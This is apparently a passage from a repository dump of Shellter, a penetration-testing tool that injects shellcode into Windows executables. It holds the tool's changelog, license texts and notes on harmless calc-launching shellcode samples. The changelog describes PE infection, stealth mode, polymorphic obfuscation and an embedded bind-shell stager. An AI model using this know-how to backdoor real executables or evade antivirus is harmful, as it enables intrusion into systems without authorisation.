code engine. 815 | 816 | [+] Minor speed optimizations in the tracing engine. 817 | 818 | [+] If Shellter finds a dropped DisASM.dll that is not being used by another 819 | instance of Shellter, then it will replace it and load the new copy. 820 | 821 | [+] Enhanced backup functionality. 
822 | Shellter will now create a 'Shellter_Backups' directory and will move there 823 | the original PE files. If the user intentionally re-infects the same PE 824 | file, Shellter will not overwrite anymore the original backup, but it will 825 | notify the user about the fact that the current PE file in use might be 826 | infected already. 827 | 828 | [+] Shellter will now enable the SE_DEBUG_NAME privilege when running as 829 | Administrator. 830 | This solves some situations where Shellter cannot detach from the child 831 | process to complete the payload injection if the latter modifies the ACEs 832 | in its own ACL with more restrictive permissions. 833 | 834 | [+] Added extra system-defined error message formatting. 835 | Shellter will display an additional human readable explanation defined by 836 | Windows OS, based on the error code number. This can assist the user to 837 | troubleshoot some issues that are not actually bugs in Shellter. 838 | 839 | [+] Addressed some extra SDL checks. 840 | 841 | [+] Various internal updates and optimizations. 842 | 843 | 844 | 845 | 846 | Shellter VI [6.3] 847 | ................... 848 | 849 | Released 20d/04m/2016 850 | 851 | [+] Fixed a bug in the validation of the user-supplied encoding sequence in 852 | Manual Mode. 853 | 854 | [+] Several optimizations in the tracing engine. 855 | 856 | [+] Minor updates and optimizations. 857 | 858 | 859 | 860 | 861 | Shellter VI [6.4] 862 | ................... 863 | 864 | Released 30d/04m/2016 865 | 866 | [+] Fixed a bug in the 'Time Travel' feature. 867 | In case Shellter doesn't find an appropriate location, based on the traced 868 | execution flow, to inject the generated code along with the payload, then 869 | it restores a previous state. This allows the user to re-configure what to 870 | inject. However, due to an error in sanitizing some variables, the new 871 | injection attempt would fail anyway. 
872 | 873 | [+] Fixed a bug that caused a "RMEM_ERROR_01" type error when using Shellter 874 | in Wine. 875 | This bug was introduced in the previous update by not correctly updating 876 | a variable after applying some updates in the code. 877 | 878 | [+] Fixed an update regarding enabling the SE_DEBUG_NAME privilege to solve 879 | some rare cases where the traced application might further restrict the 880 | access to its own object. 881 | 882 | [+] Multiple optimizations in the tracing engine. 883 | 884 | [+] Other minor updates. 885 | 886 | 887 | 888 | 889 | Shellter VI [6.5] 890 | ................... 891 | 892 | Released 14d/05m/2016 893 | 894 | [+] Fixed a logic error in the IAT Handlers feature. 895 | Under certain conditions, Shellter might have used the unicode version of 896 | GetModuleHandle function with an IAT Handler stub dedicated for the Ascii 897 | input version of it. 898 | 899 | [+] Fixed a typo issue in the command line parser that wouldn't allow to set 900 | the embedded bind_shell_tcp stager as payload from the command line. 901 | 902 | [+] Fixed a logic error in the command line parser that was triggered when 903 | specifying first '--stealth/-s' and then '--handler iat/section' arguments. 904 | When stealth mode is enabled, the iat type handler is automatically set, so 905 | there is no need to be specified by the user. In this case the parser would 906 | enter the execution path to check the handler type specified, but since 907 | that was already set it would be treated as new argument which is invalid 908 | by itself. 909 | 910 | [+] Added "[stager]" indicator next to the name of the appropriate embedded 911 | payloads. 912 | 913 | [+] Other minor updates and optimizations. 914 | 915 | 916 | 917 | 918 | Shellter VI [6.6] 919 | ...................
920 | 921 | Released 14d/09m/2016 922 | 923 | [+] Fixed a command line parsing bug that wouldn't allow to use reflective DLLs 924 | as payloads when using auto mode in conjunction with command line arguments. 925 | 926 | [+] Added a note about '--lhost' parameter in the help menu. 927 | 928 | [+] Other minor updates. 929 | 930 | 931 | 932 | 933 | Shellter VI [6.7] 934 | ................... 935 | 936 | Released 05d/10m/2016 937 | 938 | [+] Minor updates related to size checks of custom payload and polymorphic code 939 | files submitted by the user. 940 | 941 | [+] Fixed a file handle leak in the function that validates the file size of 942 | the custom payload file. 943 | 944 | [+] Minor documentation updates. 945 | 946 | [+] Other minor updates. 947 | 948 | 949 | 950 | 951 | Shellter VI [6.8] 952 | ................... 953 | 954 | Released 01d/11m/2016 955 | 956 | [+] Fixed a bug related to processing custom payload filenames 957 | in Manual Mode. Auto Mode was not affected. 958 | The buffer storing the filename was not re-initialized in case 959 | the first attempt to define the filename failed. 960 | 961 | Reported by: @fancy__04 962 | 963 | [+] Command line parser updates regarding the --Reflective 964 | parameter/argument. 965 | The parser will now make a couple of extra checks to make sure that 966 | it has been used correctly. 967 | 968 | [+] Fixed a potential file handle leak in the function that reads a 969 | custom payload from a file. 970 | We now close the handle before exiting this function. 971 | This handle was previously closed later on, once the payload injection 972 | was completed. 973 | 974 | [+] Other minor updates. 975 | 976 | 977 | 978 | 979 | Shellter VI [6.9] 980 | ................... 981 | 982 | Released 27d/02m/2017 983 | 984 | [+] Fixed a NULL pointer dereference bug in the function that parses the 985 | exports table of reflective DLLs used as payloads and calculates the 986 | offset of the reflective loader function.
987 | This would normally trigger if the user submitted a packed DLL with 988 | the exports table preserved. 989 | In that case the exported function would be located but further information 990 | extraction would fail due to the packed state of the PE file. 991 | Shellter will now handle this and report an error message. However, it is 992 | not recommended to submit packed PE files. 993 | 994 | Reported by: Max Alex 995 | 996 | [+] Added some extra proprietary error codes to assist troubleshooting in case 997 | a related bug is reported. 998 | 999 | [+] Added some extra checks in the command line parser for '--polyIAT' and 1000 | '--polyDecoder' arguments. 1001 | Shellter will now verify that '--handler IAT' and/or '--encode' arguments 1002 | have been set before using any of the aforementioned obfuscation enabling 1003 | arguments. 1004 | 1005 | [+] Minor updates in the function that adjusts the embedded payloads. 1006 | 1007 | [+] Other minor updates. 1008 | 1009 | [+] The displayed in-app logo was changed with a more minimalistic one which 1010 | fits a lot better the console view of the application. 1011 | 1012 | 1013 | 1014 | 1015 | Shellter v7.0 1016 | ................... 1017 | 1018 | Released 18d/07m/2017 1019 | 1020 | [+] Maintenance release that includes bug fixes and minor improvements that 1021 | were addressed during the development of Shellter Pro between versions 1022 | 1.0 to 2.2. 1023 | 1024 | 1025 | 1026 | 1027 | Shellter v7.1 1028 | ............... 1029 | 1030 | Released 01d/12m/2017 1031 | 1032 | [+] Fixed a bug in the last stage of Stealth Mode. 1033 | This was due to a rarely manifested issue that would cause an 1034 | ERROR_INVALID_USER_BUFFER Windows error (code: 1784). 1035 | 1036 | [+] Fixed a tracer issue in Windows 10. 1037 | Noticed that in Windows 10 Shellter would detect a few spawned system 1038 | threads during process initialization.
However, because this happens before 1039 | the actual tracing starts if the user disables tracing of all threads via 1040 | Manual Mode, or the target is a DLL, and/or DTCK is enabled, then the 1041 | tracing stage stops before even starting. 1042 | This happens because in those cases Shellter will stop tracing once an 1043 | additional thread is created. Since those system threads are irrelevant 1044 | with Shellter's technical details, the tracer was updated to ignore those 1045 | system threads on process initialization. 1046 | 1047 | [+] Fixed Windows error codes translation to error messages in Windows 10. 1048 | 1049 | [+] Fixed console and font size adjustment in Windows 10. 1050 | 1051 | [+] Other minor adjustments. 1052 | 1053 | 1054 | 1055 | 1056 | Shellter v7.2 1057 | ............... 1058 | 1059 | Released 22d/02m/2020 1060 | 1061 | [+] Added an extra detection method for Wine environment. 1062 | A recent update in Wine broke the original detection method which is 1063 | necessary in order for Shellter to operate in 'Wine Mode'. 1064 | The original detection method still applies in order to maintain 1065 | compatibility with previous Wine versions. 1066 | 1067 | [+] Minor update in the tracer. 1068 | 1069 | 1070 | 1071 | 1072 | 1073 | 1074 | 1075 | 1076 | -------------------------------------------------------------------------------- /licenses/BeaEngine.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/licenses/BeaEngine.png -------------------------------------------------------------------------------- /licenses/BeaEngine_License.txt: -------------------------------------------------------------------------------- 1 | http://beatrix2004.free.fr/BeaEngine/licence1.php 2 | 3 | This library is released under LGPL license. That means you can use it in your 4 | projects even if they are under free or proprietary licenses. 
You don't have 5 | to modify your license (if there is one) and you don't have to publish your 6 | source code. But, if you improve BeaEngine, you have to publish the modified 7 | library under one of the following license : LGPL or GPL. 8 | 9 | Here are the terms of that license : 10 | 11 | Copyright (c) 2009 , BeatriX 12 | 13 | GNU LESSER GENERAL PUBLIC LICENSE 14 | Version 3, 29 June 2007 15 | 16 | Copyright (C) 2007 Free Software Foundation, Inc. 17 | Everyone is permitted to copy and distribute verbatim copies 18 | of this license document, but changing it is not allowed. 19 | 20 | 21 | This version of the GNU Lesser General Public License incorporates 22 | the terms and conditions of version 3 of the GNU General Public 23 | License, supplemented by the additional permissions listed below. 24 | 25 | 0. Additional Definitions. 26 | 27 | As used herein, "this License" refers to version 3 of the GNU Lesser 28 | General Public License, and the "GNU GPL" refers to version 3 of the GNU 29 | General Public License. 30 | 31 | "The Library" refers to a covered work governed by this License, 32 | other than an Application or a Combined Work as defined below. 33 | 34 | An "Application" is any work that makes use of an interface provided 35 | by the Library, but which is not otherwise based on the Library. 36 | Defining a subclass of a class defined by the Library is deemed a mode 37 | of using an interface provided by the Library. 38 | 39 | A "Combined Work" is a work produced by combining or linking an 40 | Application with the Library. The particular version of the Library 41 | with which the Combined Work was made is also called the "Linked 42 | Version". 43 | 44 | The "Minimal Corresponding Source" for a Combined Work means the 45 | Corresponding Source for the Combined Work, excluding any source code 46 | for portions of the Combined Work that, considered in isolation, are 47 | based on the Application, and not on the Linked Version. 
48 | 49 | The "Corresponding Application Code" for a Combined Work means the 50 | object code and/or source code for the Application, including any data 51 | and utility programs needed for reproducing the Combined Work from the 52 | Application, but excluding the System Libraries of the Combined Work. 53 | 54 | 1. Exception to Section 3 of the GNU GPL. 55 | 56 | You may convey a covered work under sections 3 and 4 of this License 57 | without being bound by section 3 of the GNU GPL. 58 | 59 | 2. Conveying Modified Versions. 60 | 61 | If you modify a copy of the Library, and, in your modifications, a 62 | facility refers to a function or data to be supplied by an Application 63 | that uses the facility (other than as an argument passed when the 64 | facility is invoked), then you may convey a copy of the modified 65 | version: 66 | 67 | a) under this License, provided that you make a good faith effort to 68 | ensure that, in the event an Application does not supply the 69 | function or data, the facility still operates, and performs 70 | whatever part of its purpose remains meaningful, or 71 | 72 | b) under the GNU GPL, with none of the additional permissions of 73 | this License applicable to that copy. 74 | 75 | 3. Object Code Incorporating Material from Library Header Files. 76 | 77 | The object code form of an Application may incorporate material from 78 | a header file that is part of the Library. You may convey such object 79 | code under terms of your choice, provided that, if the incorporated 80 | material is not limited to numerical parameters, data structure 81 | layouts and accessors, or small macros, inline functions and templates 82 | (ten or fewer lines in length), you do both of the following: 83 | 84 | a) Give prominent notice with each copy of the object code that the 85 | Library is used in it and that the Library and its use are 86 | covered by this License. 
87 | 88 | b) Accompany the object code with a copy of the GNU GPL and this license 89 | document. 90 | 91 | 4. Combined Works. 92 | 93 | You may convey a Combined Work under terms of your choice that, 94 | taken together, effectively do not restrict modification of the 95 | portions of the Library contained in the Combined Work and reverse 96 | engineering for debugging such modifications, if you also do each of 97 | the following: 98 | 99 | a) Give prominent notice with each copy of the Combined Work that 100 | the Library is used in it and that the Library and its use are 101 | covered by this License. 102 | 103 | b) Accompany the Combined Work with a copy of the GNU GPL and this license 104 | document. 105 | 106 | c) For a Combined Work that displays copyright notices during 107 | execution, include the copyright notice for the Library among 108 | these notices, as well as a reference directing the user to the 109 | copies of the GNU GPL and this license document. 110 | 111 | d) Do one of the following: 112 | 113 | 0) Convey the Minimal Corresponding Source under the terms of this 114 | License, and the Corresponding Application Code in a form 115 | suitable for, and under terms that permit, the user to 116 | recombine or relink the Application with a modified version of 117 | the Linked Version to produce a modified Combined Work, in the 118 | manner specified by section 6 of the GNU GPL for conveying 119 | Corresponding Source. 120 | 121 | 1) Use a suitable shared library mechanism for linking with the 122 | Library. A suitable mechanism is one that (a) uses at run time 123 | a copy of the Library already present on the user's computer 124 | system, and (b) will operate properly with a modified version 125 | of the Library that is interface-compatible with the Linked 126 | Version. 
127 | 128 | e) Provide Installation Information, but only if you would otherwise 129 | be required to provide such information under section 6 of the 130 | GNU GPL, and only to the extent that such information is 131 | necessary to install and execute a modified version of the 132 | Combined Work produced by recombining or relinking the 133 | Application with a modified version of the Linked Version. (If 134 | you use option 4d0, the Installation Information must accompany 135 | the Minimal Corresponding Source and Corresponding Application 136 | Code. If you use option 4d1, you must provide the Installation 137 | Information in the manner specified by section 6 of the GNU GPL 138 | for conveying Corresponding Source.) 139 | 140 | 5. Combined Libraries. 141 | 142 | You may place library facilities that are a work based on the 143 | Library side by side in a single library together with other library 144 | facilities that are not Applications and are not covered by this 145 | License, and convey such a combined library under terms of your 146 | choice, if you do both of the following: 147 | 148 | a) Accompany the combined library with a copy of the same work based 149 | on the Library, uncombined with any other library facilities, 150 | conveyed under the terms of this License. 151 | 152 | b) Give prominent notice with the combined library that part of it 153 | is a work based on the Library, and explaining where to find the 154 | accompanying uncombined form of the same work. 155 | 156 | 6. Revised Versions of the GNU Lesser General Public License. 157 | 158 | The Free Software Foundation may publish revised and/or new versions 159 | of the GNU Lesser General Public License from time to time. Such new 160 | versions will be similar in spirit to the present version, but may 161 | differ in detail to address new problems or concerns. 162 | 163 | Each version is given a distinguishing version number. 
If the 164 | Library as you received it specifies that a certain numbered version 165 | of the GNU Lesser General Public License "or any later version" 166 | applies to it, you have the option of following the terms and 167 | conditions either of that published version or of any later version 168 | published by the Free Software Foundation. If the Library as you 169 | received it does not specify a version number of the GNU Lesser 170 | General Public License, you may choose any version of the GNU Lesser 171 | General Public License ever published by the Free Software Foundation. 172 | 173 | If the Library as you received it specifies that a proxy can decide 174 | whether future versions of the GNU Lesser General Public License shall 175 | apply, that proxy's public statement of acceptance of any version is 176 | permanent authorization for you to choose that version for the 177 | Library. 178 | -------------------------------------------------------------------------------- /licenses/Shellter_License.txt: -------------------------------------------------------------------------------- 1 | License Agreement 2 | ==================== 3 | 4 | This software makes use of the "BeaEngine Disassembler" library. 5 | 6 | This license was updated the 26th of February 2017. 7 | 8 | 9 | Disclaimer 10 | ----------- 11 | This software is created with the sole purpose to assist ethical hackers in their daily jobs during 12 | Penetration Testing and/or Red Team engagements. The author of this software and Insainted Ltd 13 | assume no responsibility for any unlawful actions taken and any damages caused by using this software. 14 | 15 | 16 | Terms of Use 17 | ============== 18 | 19 | 1) You can use this software and share it with anyone as long as you do this 20 | for free and you respect all the following terms. 21 | 22 | 2) You assume full responsibility for any damage caused by this software either 23 | this applies to you or to someone else. 
24 | 25 | 3) You assume full responsibility for any unlawful actions taken by using this 26 | software. 27 | 28 | 4) You are allowed to modify this software, but if you do then you have to 29 | explicitly state so in case you share it with other people. 30 | 31 | 5) You are allowed to reverse engineer it, disassemble it, debug it, for any 32 | reason that might be, but in case you find a bug then please report it to 33 | the author and give him the necessary amount of time to fix it before 34 | disclosing it. 35 | 36 | 6) You are allowed to distribute this software from your own website, but if 37 | you do then you have to include a link to the official website along with 38 | a link to this license agreement. 39 | 40 | 7) You are allowed to use this software for work purposes, but you are not 41 | allowed to charge for it. 42 | 43 | This means that you have the right to use it as a complementary tool to 44 | assist you at work for business purposes, but you are not allowed to use 45 | it in situations that fall in the following two cases (a and b) without the 46 | written agreement of its author. 47 | 48 | a. You are not allowed to build a commercial service based on this software. 49 | b. You are not allowed to integrate this software with any other software, 50 | unless it's for private usage and does not violate the previous term. 51 | 52 | 8) You are not allowed to use this software to gain unauthorized access to a 53 | computer system or network without a written agreement of its owner. 54 | 55 | 9) You are not allowed to build any type of public software such as 'tools', 56 | 'scripts', 'applications', and 'frameworks', that are using and/or 57 | referencing this software without the written agreement of its author.
58 | 59 | 60 | Thank you, 61 | kyREcon -------------------------------------------------------------------------------- /shellcode_samples/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellcode_samples/calc -------------------------------------------------------------------------------- /shellcode_samples/calcenc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellcode_samples/calcenc -------------------------------------------------------------------------------- /shellcode_samples/info.txt: -------------------------------------------------------------------------------- 1 | These are set to kill the process after execution, so don't use them to evaluate Stealth Mode. 2 | 3 | 4 | calc: Launch Calc.exe - No Encoding 5 | 6 | calcenc : Launch Calc.exe - Custom Encoding 7 | 8 | krb1: Launch Calc.exe - Metasploit Single Encoding 9 | 10 | krb3 : Launch Calc.exe - Metasploit Triple Encoding -------------------------------------------------------------------------------- /shellcode_samples/krb1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellcode_samples/krb1 -------------------------------------------------------------------------------- /shellcode_samples/krb3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellcode_samples/krb3 -------------------------------------------------------------------------------- /shellter.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/shellter.exe --------------------------------------------------------------------------------